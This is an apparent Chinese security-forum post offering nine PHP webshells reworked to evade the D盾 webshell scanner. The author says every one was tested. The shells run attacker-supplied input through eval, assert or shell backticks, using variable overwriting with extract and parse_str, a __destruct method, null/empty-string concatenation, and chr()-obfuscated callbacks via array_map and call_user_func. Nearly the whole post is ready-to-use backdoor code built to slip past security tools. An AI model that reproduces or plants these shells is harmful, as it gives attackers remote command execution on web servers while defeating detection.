0x00 前言

最近在测试过程中遇到了D盾,悲催的发现所有过D盾的webshell都被查杀了。因此就在网上搜索了一些之前可以过D盾的shell,然后将其做了一些变形(有一些shell没有更改),使其可以过D盾。本次一共奉献上9个可过D盾的shell,全部亲测可过。

0x01 extract 变量覆盖过D盾

<?php  $a=1;$b=$_POST;extract($b);print_r(`$a`)?>

0x02 parse_str 变量覆盖过D盾

<?php  $a=1;$b="a=".$_GET['a'];parse_str($b);print_r(`$a`)?>

0x03 __destruct 析构函数过D盾

<?php 

class User
{
  public $name = '';

  function __destruct(){
    eval("$this->name");
  }
}

$user = new User;
$user->name = ''.$_POST['name'];
?>

0x04 null 拼接过D盾

<?php

$name = $_GET['name'];

$name1=$name2= null;

eval($name1.$name2.$name);

?>

0x05 '' 拼接过D盾

<?php

$name = $_GET['name'];

$name1=$name2= '';

eval($name1.$name2.$name);

?>

0x06 '' null 拼接过D盾

<?php
$a = $_GET['a'];
$c = null;
eval(''.$c.$a);

?>

0x07 array_map函数过D盾

<?php
function user()
{
$a123 =  chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
return ''.$a123;
}
$a123 = user();
$x123 =array($_GET['x']);
array_map($a123,$a123 = $x123 );
?>

0x08 call_user_func_array函数过D盾

<?php

function a(){
     return 'assert';
}
$a=a();
$aa = array($_GET['x']);
call_user_func_array($a,$a=$aa);
?>

0x09 call_user_func函数过D盾

<?php
function a(){
     return 'assert';
}
$a=a();
$aa=$_GET['x'];
call_user_func($a,$a=$aa);
?>

点击收藏 | 8 关注 | 3
  • 动动手指,沙发就是你的了!
登录 后跟帖